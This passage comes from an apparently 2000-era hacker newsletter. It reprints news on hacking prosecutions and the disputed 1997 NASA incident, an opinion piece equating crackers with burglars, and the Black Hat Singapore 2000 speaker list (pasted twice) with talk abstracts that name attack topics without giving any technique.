      government levels, including three of the Big Five accounting firms, the 
      United States Air Force, and defense contractors for classified Department 
      of Defense projects such as the B-2 Stealth Bomber.

      Foundstone's multi-pronged approach to preventing computer crime involves 
      building security expertise within corporations through training, attack 
      and penetration testing, and incident-response assessment. Using these 
      methods, Foundstone has secured the computer operations of leading 
      dot-coms and Global 2000 companies across a wide range of industries. 
      Contact Foundstone at 877/91-FOUND or visit www.foundstone.com.

      About Black Hat Briefings 2000

      The Black Hat Briefings conference series brings together corporate 
      security professionals and the ``underground'' security experts who 
      develop the tools used by and against hackers. By tradition, the Black Hat 
      Briefings are held in Las Vegas during the days immediately preceding DEF 
      CON, the largest hacker convention in the U.S. This year, the Black Hat 
      Briefings are July 26-27, with DEF CON 8.0 following on July 28-30.

      The Black Hat Briefings conference is an ``in the trenches'', 
      vendor-neutral gathering where administrators, engineers, and programmers 
      learn about the latest developments in hacking and computer security, 
      giving them a no-nonsense way to protect their networks and systems in the 
      real world. For more information visit www.blackhat.com.

      Foundstone, Inc. -- Securing the Dot Com World 
      
      
      --------------------------------------------------------------------------------
      Contact: 
      
      
           Foundstone, Inc.
           Nico Sell, 650/456-0943
           nico@foundstone.com
      @HWA
      

282.0 [IND] Student Admits Hacking U.S. Government Computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_063000a_j.shtml      
      
      
      6/30/00 Student Admits Hacking U.S. Government Computers

      BOSTON (Reuters) - A university student admitted in Boston federal court 
      to breaking into U.S. government computers including Defense Department 
      and NASA systems.

      Ikenna Iffih, a student at Northeastern University's College of Computer 
      Science, pleaded guilty to a series of coast-to-coast cyber attacks before 
      U.S. District Judge Robert Keeton late on Thursday.

      Under a plea deal, Iffih faces up to 20 years in prison with a possible 
      mandatory minimum sentence of six months, a fine of up to $750,000 and 
      three years of supervised release when sentenced on Oct. 25.

      The 29-year-old student also admitted hacking into Zebra Marketing Online 
      Services (ZMOS), a Washington-state based company that provides Web 
      service to other firms. Court papers showed the Bainbridge Island company 
      near Seattle lost more than $30,000 and took about 42 hours to return to 
      minimal operations during the April 1999 attack.

      FBI agents, after obtaining about 20 court orders, were able to trace the 
      break-ins to the NASA (National Aeronautics and Space Administration) 
      computer, the Defense Department's Logistics Agency computer, and ZMOS 
      system to the personal computer in Iffih's Boston home.

      ``All in all, the defendant used his home computer to leave a trail of 
      cybercrime from coast to coast,'' U.S. Attorney for Massachusetts Donald 
      Stern said in a statement. 
      
      @HWA

283.0 [IND] Hacker may have endangered astronauts 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070300a_j.shtml      
      
      7/03/00
      Hacker May Have Endangered Astronauts 
      By The Associated Press
      Special to CNET News.com
      July 2, 2000, 6:00 p.m. PT     
      
      http://news.cnet.com/news/0-1005-200-2194575.html 
      
      Hacker may have endangered astronauts 
      By The Associated Press
      Special to CNET News.com
      July 2, 2000, 6:00 p.m. PT 
      LONDON--A computer hacker endangered shuttle astronauts in 1997 by 
      overloading NASA's communication system, according to a report.

      As the shuttle docked at the Russian space station Mir, a hacker tapped 
      into the National Aeronautics and Space Administration computer system 
      that monitors the heartbeat, pulse and medical condition of astronauts 
      aboard the spacecraft, the British Broadcasting Corp. reported today. 

      "We had an activity at NASA center where a hacker was overloading our 
      system...to such an extent that it interfered with communications between 
      the NASA center, some medical communications and the astronaut aboard the 
      shuttle," Roberta Gross, inspector general at NASA, said in a BBC 
      documentary to be aired tomorrow. 

      NASA was forced to switch systems and talk to the astronauts via the space 
      station. 

      The report was released ahead of the premiere of "Cyber Attack," which 
      looks at how hackers are able to penetrate the defense systems of such 
      countries as the United States and Britain. 

      Gross said NASA has numerous fail-safe measures to ensure communications, 
      "but it shows the potential hackers have for doing some real damage to 
      NASA's mission and astronaut safety." 

      In the past year, NASA has experienced more than 500,000 cyberattacks, the 
      report said. 

      "Everybody knows if there's a problem at Houston, a potential 
      vulnerability or someone is able to supersede the system we set up, that's 
      dangerous," Gross said. 

      Astronaut Michael Foale, who was part of the 1997 mission, told the BBC he 
      was not informed of the problems at the time but found the revelations 
      intriguing. 

      Copyright  2000 Associated Press. All rights reserved. This material may not
      be published, broadcast, rewritten, or redistributed. 
      
      @HWA

284.0 [IND] Accused UAE Hacker Files Defamation Lawsuit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070300b_j.shtml      
      
      7/03/00
      Accused UAE Hacker Files Defamation Lawsuit
      By Steve Gold, Newsbytes
      DUBAI, UNITED ARAB EMIRATES,
      03 Jul 2000, 1:20 PM CST
      
      A British man who was arrested in mid-June, suspected of hacking into the 
      United Arab Emirates' (UAE's) Internet system, has sued the 
      telecommunications company instrumental in his arrest.

      The unnamed 21-year-old, originally from the UK, was arrested in mid June 
      and was expected to be charged with damaging the country's economy, a 
      serious offense that carries up to a 10-year prison sentence.

      The 21-year-old man, who works as a senior computer engineer in Dubai, was 
      traced by Etisalat's network security staff. He was released after 24 
      hours in jail and has not yet been charged.

      The case is thought to be the first computer hacking in the Middle East. 
      Like many countries in the region, the UAE has no computer security 
      legislation in place.

      In press reports after the arrest, Etisalat officials blamed the suspected 
      hacker for much of the disruption that has been experienced by local 
      Internet subscribers in the past two weeks.

      Some local media reports appear to have revealed sufficient information 
      for the man to be identified by people in the UAE computer industry.

      As a result of this, his lawyer, Habib al-Mulla told reporters over the 
      weekend that his client was filing for defamation. The lawyer has also 
      applied for copies of Etisalat's records from when the alleged sabotage on 
      its computer systems took place.

      Reports suggest that Etisalat will appear in court on July 9 to offer its 
      defense in the defamation case.

      If charges are made, al-Mulla's client could face up to 10 years in 
      prison, although media reports suggest that he will only face up to six 
      months, as well as fines approaching $2,750.

      Etisalat's Web site is at http://www.etisalat.co.ae . 
      
      @HWA

285.0 [IND] NASA Denies Hacker Attack Danger
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070500a_j.shtml
      
      7/05/00 
      
      NASA Denies Hacker Attack Danger
      By DAVID HO, Associated Press Writer
      
      WASHINGTON (AP) - NASA officials denied reports Monday that a computer 
      hacker attack in 1997 endangered astronauts by disrupting communications 
      with the space shuttle Atlantis.

      The British Broadcasting Corp. had reported that during a rendezvous with 
      the Russian space station Mir, a hacker interfered with communications and 
      forced the shuttle crew to use the Russian station to maintain contact 
      with NASA.

      http://dailynews.yahoo.com/h/ap/20000703/tc/nasa_hacker_1.html 

      Monday July 3 7:38 PM ET       NASA Denies Hacker Attack Danger By DAVID 
      HO, Associated Press Writer 

      WASHINGTON (AP) - NASA officials denied reports Monday that a computer 
      hacker attack in 1997 endangered astronauts by disrupting communications 
      with the space shuttle Atlantis.

      The British Broadcasting Corp. had reported that during a rendezvous with 
      the Russian space station Mir, a hacker interfered with communications and 
      forced the shuttle crew to use the Russian station to maintain contact 
      with NASA.

      ``At no point did ground controllers lose contact with the astronauts. 
      That never happened,'' said National Aeronautics and Space Administration 
      spokesman Bob Jacobs.

       Speak your mind       Discuss this story with other people. [Start a 
       Conversation] (Requires Yahoo! Messenger)  

      He also said the astronauts never used the Russian space station as a 
      communications relay.

      The BBC could not immediately be reached for comment.

      Jacobs did confirm a hacker had delayed the transmission of astronaut 
      medical data between NASA computer systems on the ground, but backup 
      systems corrected the problem. The medical information had already been 
      sent down from the shuttle and was being distributed to different 
      locations.

      ``People try to hack into the system constantly, but any mission critical 
      computer system is insulated from the communications network,'' he said, 
      noting that hackers had made about 500,000 attacks against the space 
      agency in the last year.

      Jacobs said NASA's headquarters didn't know who had conducted the attack, 
      but the agency's inspector general is investigating the incident.

      The BBC report was released in advance of a documentary aired Monday 
      called ``Cyber Attack,'' which looked at how hackers penetrate the 
      computer defenses of countries like the United States and Britain.

      The BBC reported that Roberta Gross, NASA inspector general, said, ``We 
      had an activity at NASA center where a hacker was overloading our system 
      ... to such an extent that it interfered with communications between the 
      NASA center, some medical communications and the astronaut aboard the 
      shuttle.''

      Jacobs said Gross had been referring to the disruption on the ground and 
      not any problem communicating with the astronauts.

      During the September 1997 mission, the space shuttle Atlantis retrieved 
      astronaut Michael Foale, who had spent 134 days aboard Mir.

      Last Thursday, a former computer science student of Northeastern 
      University pleaded guilty to going on a hacking spree against private and 
      government targets, including the military and NASA. Ikenna Iffih, 20, 
      broke into computers at NASA's Goddard Space Flight Center in Greenbelt, 
      Md. and installed a program to capture users' names and passwords.

      -

      On the Net:

      The National Aeronautics and Space Administration: http://www.nasa.gov

      BBC program Panorama: http://news.bbc.co.uk/hi/english/events/panorama/ 
      
      @HWA

286.0 [IND] 'Houston, We Don't Have A Problem.' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070500b_j.shtml
      
      7/05/00
      'Houston, We Don't Have A Problem. '
      By David McGuire, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      03 Jul 2000, 5:05 PM CST
      
      NASA today refuted media reports that earth-based hacker activities 
      endangered the lives of astronauts on Space Shuttle Atlantis during a 1997 
      mission.

      Responding to a BBC report indicating that a hacker attack on NASA 
      communications systems had somehow interfered with Mission Control's 
      ability to monitor the astronauts' vital statistics, NASA today said that 
      the Atlantis crew was never in any danger.

      "Two ground-based computers were delayed in talking to each other (as a 
      result of the 1997 hack) and in fact, the transmission went through," NASA 
      spokesperson Ed Campion said today. The hack had no effect on "information 
      that was flowing up to, or down from, the space shuttle," Campion said.

      In a report earlier today, Reuters quoted NASA Inspector General Robin 
      Gross as telling the BBC that the hacker attack so disabled NASA computers 
      as to jeopardize shuttle-to-ground communications.

      But while Campion today confirmed that NASA suffered a hacker attack 
      during the September 1997 Atlantis mission, he contended that shuttle-to- 
      ground communications systems are walled off from the Internet and are 
      "very well protected."

      "You have to be in the (Mission Control) building to have access to those 
      systems," Campion said.

      The information transfer that was delayed by the attack was a "routine" 
      medical communication between Houston-based Mission Control and another 
      NASA location, Campion said.

      The 1997 attack remains under investigation by NASA's Inspector General, 
      Campion said. 
      
      @HWA

287.0 [IND] Crackers are Common Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_070500c_j.shtml
      
      7/05/00
      Crackers are Common Criminals
      By: Andrew Thomas
      Posted: 04/07/2000 at 17:47 GMT 

      Hackers have a certain romantic image - it's a bit like Robin Hood; the 
      small man against the machine; the righter of wrongs, that sort of thing. 

      On British TV the other night, a young hacker from Wales was asked why he 
      had broken into a computer and downloaded several thousand people's bank 
      details. He replied that he had done it to prove that the bank's security 
      procedures were inadequate. It should have been obvious that he had no 
      criminal intent and naturally hadn't done anything with the downloaded 
      details. If he hadn't done it, someone else would have. 

      You are a judge. Before you in the court stands a pimply-faced youth with 
      greasy hair and an ill-advised vestigial beard. He stands accused of 
      breaking into several dozen houses and stealing credit card details and 
      address books. The address books were used to identify future properties 
      to burgle and, whilst in each house, he burnt all the personal 
      correspondence he could find. 

      His defence? 

      "I only did it to prove that the locks on these people's doors were 
      inadequate. If I hadn't done it, someone else would. It's the lock makers' 
      fault." 

      Do you, the judge, dismiss the charges and commend the young chap for his 
      public-spiritedness, whilst roundly condemning locksmiths for their sloppy 
      workmanship? Or do you sentence him to a public flogging and then send him 
      to choky? 

      Spinal Tap       Another housebreaker stands accused of a number of 
      break-ins where he stole expensive stereo systems and CD collections. In 
      mitigation, he blames Metallica, Napalm Death and Spinal Tap for making 
      him do it. The reasoning is obvious - if these bands hadn't recorded 
      unencrypted music onto CDs in the first place, he wouldn't have been 
      tempted to pop into other people's houses while they were out and remove 
      them. And he needed the stereo systems to play them on. And the beer from 
      the fridge. And the car to carry it all away in. 

      In what way is hacking into a computer any different from breaking into a 
      house? Both are private property. Locks on doors are only necessary 
      because there are people who can't be bothered to work. They would much 
      rather you worked hard to buy things that they could later remove while 
      you were out earning more money. 

      Faulty locks are not the issue here - criminals are. 

      So why is it always Microsoft that gets blamed for making it too easy for 
      the criminals? Why aren't Compaq, Dell, IBM, Intel and AMD to blame for 
      providing the systems the hackers break into? For that matter, why aren't 
      the telcos and ISPs guilty, too? Do we read stories about Sony being 
      accused that its TVs and videos are encouraging break-ins because you 
      can't bolt them to the floor? 

      Of course Microsoft is a very successful company headed up by very rich 
      people, so envy is probably a key factor here. But surely Microsoft is 
      only exposed to hack attacks to the degree it is because millions of 
      people actually like its products and want to use them. They don't want 
      functionality removed, they want criminals to leave them alone. 

      A hack attack on a Word or Outlook user is surely criminal trespass on 
      their (electronic) property in exactly the same way it is if a burglar 
      breaks into their house. It doesn't matter how easy or hard it is - it's 
      still wrong. 

      Stop blaming Microsoft - it's the hackers who are the guilty ones. 

      http://www.theregister.co.uk/content/1/11763.html 
      
      @HWA

288.0 [IND] Black Hat Briefings -Singapore, May 2000
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      7/05/00
      Black Hat Briefings -Singapore, May 2000
      
      This stuff is GOOD.
      Speaker presentations in Power Point, Audio and Video are available at:
      
      http://www.blackhat.com/html/bh-asia-00/bh-asia-00-speakers.html 
      
      
      SPEAKERS 
      There were be approximately 14 speakers over two days, including 
      a moderated panel discussion. 
      
      5/02/00 Presentation materials now on-line. A/V is encoding this week. 
      
      The goal of the talks are to inform the audience with quality current state
      system vulnerabilities and fixes as well as future areas of concern.  
      We cover a broad range of security issues from the perspective of the 
      network administrator, system cracker, and IS managers.  Because our unique
      speakers The Black Hat Briefings will offer the audience a deep insight into 
      the real security issues facing your network with no vendor pitches!
       
      
      
      --------------------------------------------------------------------------------
      
      Greg Hoglund - Rootkit.com 
      Advanced Buffer Overflow Techniques 
      
      This is a technical talk aimed at people who have already been exposed to 
      buffer overflows and want to learn more.  The talk assumes the audience 
      has at least some knowledge of CPU's and Processes.  For those of you who 
      already understand buffer overflows, this talk will be a refreshing 
      discourse on technique.  We will show how the injection method can be 
      decoupled from the payload.  We then explore the details and challenges of  
      injecting code into a remote process.  We will also explore the payload, 
      the encoding methods, and how to dynamically load new functions.  Lastly, 
      we discuss the possible effects of a payload, including network worms, 
      virus, and rootkits.  

      Greg Hoglund is a software engineer and researcher.  His most notable 
      achievement was the creation of the Asmodeus Security Scanner, a Windows 
      NT based port scanner and ethernet sniffer, which he later sold to 
      Webtrends, Corp.  Additionally, Hoglund has written several white papers 
      on content based attacks, kernel patching, and forensics.  He currently 
      works as a researcher for Tripwire Security Systems, exploring forensics 
      issues. 
      
      Their Presentation!(PowerPoint 247k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Batz -  Independent Security Researcher. 
      Casing the Joint.  What we already know about your network.  
      
      An overview of what an attacker already knows about your network.  The 
      information is described using an ASN.1 template for possible integration 
      into autonomous agents, conspicuously similar to the ones described in 
      Caezars presentation.  

      Batz is an independent security researcher and Evil Super Villain who 
      caused a stir last year by bringing to light some serious concerns with 
      BGP4 configuration and implementation at Blackhat Briefings 99 in Las 
      Vegas Nevada.  

      Their Presentation!(PowerPoint 86k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Mudge - VP of R&D for @Stake. 
      An analysis of tactics used in discovering "passive" monitoring devices. 
      
      Formerly CEO and Chief Scientist at renowned "hacker think tank", the 
      L0pht, Mudge is considered one of the nations leading "grey-hat hackers". 
      He, along with the other members of the L0pht, are now heading up @Stake's 
      research labs ensuring that the company is at the cutting edge of Internet 
      security. 

      Mudge is a widely sought after keynote speaker in various forums, 
      including analysis of electronic threats to national security. He has been 
      called to testify before the Senate Committee on Governmental Affairs, has 
      briefed a wide range of members of Congress and has conducted training 
      courses for the Department of Justice, NASA, the US Air Force, and other 
      governmental agencies. 

      A recognized name in crytpanalysis, Mudge has co-authored papers with 
      Bruce Schneier that were published in the 5th ACM Conference on Computer 
      and Communications Security, and the Secure Networking - CQRE 
      International Exhibition and Congress. 

      He is the original author of L0phtCrack the award winning NT password 
      auditing tool. In addition, Mudge co-authored Anti-Sniff, the world's 
      first commercial remote promiscuous mode detection program. He has written 
      over a dozen advisories and various tools -- many of which resulted in 
      numerous CERT advisories, vendor updates, and patches.

      
      --------------------------------------------------------------------------------
       
      Caezar -  
      Malicious Information Gathering 
      
      As in physical surveillance, information can be gathered about a target network 
      without penetrating its security perimeter.  Using computer virus and worm techniques
      to surround the target, an opponent can monitor and collect web and e-mail traffic.  
      Critical business communications could be altered in transit or halted altogether.  
      This discussion will cover independent autonomous agents, information filtering and 
      malicious code propagation. 
      
      Their Presentation!(PowerPoint 92k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. 
      Dave Ahmad -UN*X Security Specialist, Security-Focus.com. 
      Routers, Switches & more: The glue that binds them all together. 
      
      By now, anyone with an inkling about security knows that they need to protect their 
      assets.  We've all heard we need a firewall, and we all know that we need to lock down 
      machines.  What about the glue that binds them all together?  The routers, switches, 
      network administration protocols, authentication protocols...what about that stuff?  
      This talk will go in to the security flaws you don't even think about, realize are 
      there, or have dismissed as being inconsequential.  
      
      Jeremy Rauch has been involved in discovering and researching security vulnerabilities
      from a number of different perspectives.  Working with vendors, he has identified and 
      helped fix over two dozen major security vulnerabilities.  Jeremy is currently a developer
      at one of the largest security vendors, where part of his duties include the identification 
      and reporting of security risks.  Jeremy is also one of the founders of Security Focus, Inc.
      a centralized online security resource offering security news, products, events, books, 
      tools, and one of the most comprehensive vulnerability listing on the net. 
      
      Dave has been working with network and Unix security for a number of years and is a founding
      member of Security-Focus.com.  He has dealt with both general Unix auditing and intrusion 
      detection as well as secure software development.  Dave is the co-host of Info.Sec.Radio, a 
      radio show airing twice a month on both a Canadian radio station and the Internet via a 
      RealAudio stream.  
      
      Their Presentation!(PowerPoint 208k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Marcus Ranum - CEO Network Flight Recorder. 
      Intrusion Detection and Network Forensics. 
      
      Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing in Internet
      security since he built the first commercial firewall product in 1989. He has acted as chief
      architect and implementor of several other notable security systems including the TIS firewall
      tool kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight Recorder. Marcus 
      frequently lectures on Internet security issues, and is co-author of the "Web Site Security 
      Source book" with Avi Rubin and Dan Geer, published by John Wiley and sons. 
      
      Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      JD Glaser - CEO of NT Objectives. 
      Auditing NT -  
      
      This talk will be the third in a series to address the issue of auditing an NT box after a break in.
      Specifically, we will extend our look under the hood to find places where altered files can hide as 
      well as examine the evidence left behind by an intruder. This talk will also cover a set of tools that
      can uncover various hidden aspects of NT's Internal state. NT's built in tools are not sufficient in 
      most cases for examining system state, so this talk include a small tutorial on a suite of free tools
      I have made to aid Windows NT intrusion research. Details will include: 
      
      Examine NTFS file time stamping 
      Examine NT Drivers behavior 
      Examining permissions/file attributes 
      Examining COM security backdoors Part III 
      Looking for trojan behavior Part III 
      Finding for backdoors in Windows NT
      JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for Windows NT. Most notably,
      NTLast and Forensic Toolkit, which are free tools for the security community. He is an MCSE/MCSD that 
      specializes in contract DCOM programming and NT network security. Clients have included, Intel, HP, 
      Columbia Sportsware and Tripwire. Latest projects have involved NTFS file system code for Tripwire for
      NT and file system filters for real-time detection systems for NT that bypass NT's untrusted API. 
      Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jennifer Granick - Attorney at Law. 
      International Legal issues surrounding computer hacking. 
      
      A global computer network poses special questions in computer crime prevention and punishment.  There is 
      no international consensus on what a computer crime is or what should be prohibited conduct.  Nor are there
      agreements on procedural matters such as transborder searches, data preservation, standard of proof or 
      jurisdiction.  This presentation will review the points of contention, discuss current efforts towards 
      obtaining consensus and highlight the benefits and detriments of international consensus to investigators 
      and civil libertarians alike. 
      
      Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech and computer crime from her 
      office in San Francisco.  She defends unauthorized access, trade secret theft, and email interception cases 
      nationally.  Granick has written articles on wiretapping, workplace privacy and trademark law for Wired.  
      Additionally, she has spoken at previous Black Hat Briefings and to NASA computer security professionals 
      about computer crime laws, digital forensics and evidence collection. 
      
      Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Martin Khoo - Assistant Director, Incident Handling, SingCERT 
      Responding to Cyber Threats. 
      
      IT and the Internet are fast becoming important parts of our national competitiveness. With the emerging 
      globalization and worldwide connectivity, Internet security threats in other parts of the world can quickly
      translate into security issues that are potentially damaging to the local IT community. It is crucial for 
      Singapore to be able to respond efficiently and effectively to Internet computer incidents and security 
      breaches. It is important to have a localized CERT effort that offers security incident resolution services 
      in a timely and effective manner.  
      
      This talk will introduce the Singapore Computer Emergency Response Team (SingCERT) and cover the various 
      programmes and initiatives that SingCERT offers to its constituency. It will also touch on the experience and
      lessons learnt through the handling and resolution of security incidents and highlight some of the trends in 
      incidents reported to SingCERT.  
      
      Martin is an Assistant Director with the Infocomm Development Authority (IDA) of Singapore. He takes charge of 
      security incident management where he oversees a group of IT Security Consultants in providing security services 
      to the various government organizations. He is also the Programme Manager of the Singapore Computer Emergency 
      Response Team (SingCERT) which is the national level security incident response center charged with the prevention,
      detection and resolution of computer security incident on the Internet and Singapore ONE. He manages a group of 
      Security Consultants providing incident resolution and security awareness promotion services to the local IT 
      industry and the general IT users. Martin is a frequent speaker on subjects regarding security and incident 
      handling. He last spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" organized by 
      CommerceNet Singapore in October 1999. 
      
      Their Presentation! (PowerPoint 107k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Pierre Noel - CEO of ICSA.net Asia Pacific 
      Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) 
      
      Why are so many companies, organizations and agencies regularly hacked? Some of these regularly hacked 
      organizations have however invested huge amounts in crafting their IT architectures.  Security products,
      both hardware and software, are available off-the-shelf. Some of them underwent strong security 
      certifications, and they are widely used in the Internet, even by the companies mentioned above. 
      
      So, what's wrong with the strategy? 
      
      In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out of the five most important 
      inhibitors were security-related; the same survey in '99 showed these security-related inhibitors 
      pushed back to rank 20 to 50! Does this mean that security is no longer an inhibitor to eCommerce? Or
      does this imply something else? 
      
      Prior to the second World War, the French Army erected the Maginot Line to protected themselves against
      invasion. Pride of the nation, the Maginot line proved to be totally useless, and the invasion of France 
      took place at a very rapid pace. Can we possibly transpose this story to the IT world? 
      
      With a series of 'field' observations, Pierre will discuss the reasons for security weaknesses, and derive
      simple paths to reducing these exposures. 
      
      Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the president and founder of Burton & Brooks
      International, a consulting firm specialized in IT security for large enterprises and governments. As 
      president of Burton & Brooks, Pierre is charged with the role of chief technical officer for the Hong Kong
      Post Public Key Infrastructure and Root Certification Authority project. 
      
      Previously, Pierre was first the director of security best practice, Asia for PLATINUM technology, before he
      was promoted to vice president for Security Consulting Worldwide after Computer Associates' acquisition of 
      PLATINUM.  Pierre has more than 10 years of experience in providing independent consultancy worldwide. He 
      specialized in the fields of Enterprise Security and large scale mission critical OLTP systems. Pierre was 
      chief consultant and architect at the Open Software Foundation, then known as The Open Group. 
      
      Their Presentation! (PowerPoint 1,118k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. 
      Computer Crime: The law enforcement perspective with case studies. 
        
      
      Their Presentation! (PowerPoint 497k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Joey__ (a.k.a Nishad Herath) - CTO of SecureSolv.com. 
      Advanced Windows NT Security. 
      
      In his talk, he will walk you through the exploitation of an unpublished real world Windows NT based buffer
      overflow exploit as an example discussing the following: 
      
      * A reverse engineering approach to Windows NT software security exploration. How advanced tools like IDA 
      and SoftICE can be utilised  to analyze software and OS for vulnerabilities. (Who cares about source!) 
      * Advanced Win32 shellcode techniques and how the most protected systems can be broken with innovative 
      shellcode (including shellcode techniques unpublished to date). * Shellcode considerations specific to 
      the Windows NT (including issues unpublished to date). 
      * Protection from exploitation! discussion of innovative new buffer overflow prevention technology and 
      advanced backdooring prevention for Windows NT. 
      
      Joey__ is the CTO of SecureSolv.com, Sri Lanka's pioneering IT security consultancy firm specializing in
      IT security for e-Businesses, advanced security research, auditing,  reverse-engineering services as well
      as technical consultancy for security products and services.  With more than 6 years of experience in the
      industry, Joey__ specializes in Windows NT / Windows 2000 kernel architecture, security, systeem internals
      exploration, exploitation and intrusion protection techniques. He early work includes publishing the internal
      workings of  Windows NT Native Call Interface which was undocumented at the time. 
      SPEAKERS 
      There were be approximately 14 speakers over two days, including 
      a moderated panel discussion. 
      
      5/02/00 Presentation materials now on-line. A/V is encoding this week. 
      
      The goal of the talks are to inform the audience with quality current state system vulnerabilities and fixes 
      as well as future areas of concern.  We cover a broad range of security issues from the perspective of the 
      network administrator, system cracker, and IS managers.  Because our unique speakers The Black Hat Briefings 
      will offer the audience a deep insight into the real security issues facing your network with no vendor pitches!
       
      
      
      --------------------------------------------------------------------------------
      
      Greg Hoglund - Rootkit.com 
      Advanced Buffer Overflow Techniques 
      
      This is a technical talk aimed at people who have already been exposed to buffer overflows and want to learn 
      more.  The talk assumes the audience has at least some knowledge of CPU's and Processes.  For those of you who
      already understand buffer overflows, this talk will be a refreshing discourse on technique.  We will show how 
      the injection method can be decoupled from the payload.  We then explore the details and challenges of  injecting
      code into a remote process.  We will also explore the payload, the encoding methods, and how to dynamically load 
      new functions.  Lastly, we discuss the possible effects of a payload, including network worms, virus, and rootkits.  
      
      Greg Hoglund is a software engineer and researcher.  His most notable achievement was the creation of the Asmodeus
      Security Scanner, a Windows NT based port scanner and ethernet sniffer, which he later sold to Webtrends, Corp.  
      Additionally, Hoglund has written several white papers on content based attacks, kernel patching, and forensics. 
      He currently works as a researcher for Tripwire Security Systems, exploring forensics issues. 
      
      Their Presentation!(PowerPoint 247k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Batz -  Independent Security Researcher. 
      Casing the Joint.  What we already know about your network.  
      
      An overview of what an attacker already knows about your network.  The information is described using an ASN.1 
      template for possible integration into autonomous agents, conspicuously similar to the ones described in Caezars 
      presentation.  
      
      Batz is an independent security researcher and Evil Super Villain who caused a stir last year by bringing to light
      some serious concerns with BGP4 configuration and implementation at Blackhat Briefings 99 in Las Vegas Nevada.  
      
      Their Presentation!(PowerPoint 86k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Mudge - VP of R&D for @Stake. 
      An analysis of tactics used in discovering "passive" monitoring devices. 
      
      Formerly CEO and Chief Scientist at renowned "hacker think tank", the 
      L0pht, Mudge is considered one of the nations leading "grey-hat hackers". 
      He, along with the other members of the L0pht, are now heading up @Stake's 
      research labs ensuring that the company is at the cutting edge of Internet 
      security. 

      Mudge is a widely sought after keynote speaker in various forums, 
      including analysis of electronic threats to national       security. He 
      has been called to testify before the Senate Committee on Governmental 
      Affairs, has briefed a wide range of members of Congress and has conducted 
      training courses for the Department of Justice, NASA, the US Air Force, 
      and other governmental agencies. 

      A recognized name in crytpanalysis, Mudge has co-authored papers with 
      Bruce Schneier that were published in the 5th       ACM Conference on 
      Computer and Communications Security, and the Secure Networking - CQRE 
      International Exhibition and Congress. 

      He is the original author of L0phtCrack the award winning NT password 
      auditing tool. In addition, Mudge co-authored       Anti-Sniff, the 
      world's first commercial remote promiscuous mode detection program. He has 
      written over a dozen advisories and various tools -- many of which 
      resulted in numerous CERT advisories, vendor updates, and patches.
       
      
      --------------------------------------------------------------------------------
       
      Caezar -  
      Malicious Information Gathering 
      
      As in physical surveillance, information can be gathered about a target 
      network without penetrating its security perimeter.  Using computer virus 
      and worm techniques to surround the target, an opponent can monitor and 
      collect web and e-mail traffic.  Critical business communications could be 
      altered in transit or halted altogether.  
      This discussion will cover independent autonomous agents, information filtering
      and malicious code propagation. 
      
      Their Presentation!(PowerPoint 92k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. 
      Dave Ahmad -UN*X Security Specialist, Security-Focus.com. 
      Routers, Switches & more: The glue that binds them all together. 
      
      By now, anyone with an inkling about security knows that they need to 
      protect their assets.  We've all heard we need a firewall, and we all know 
      that we need to lock down machines.  What about the glue that binds them 
      all together?  The routers, switches, network administration protocols, 
      authentication protocols...what about that stuff?  This talk will go in to 
      the security flaws you don't even think about, realize are there, or have 
      dismissed as being inconsequential.  

      Jeremy Rauch has been involved in discovering and researching security 
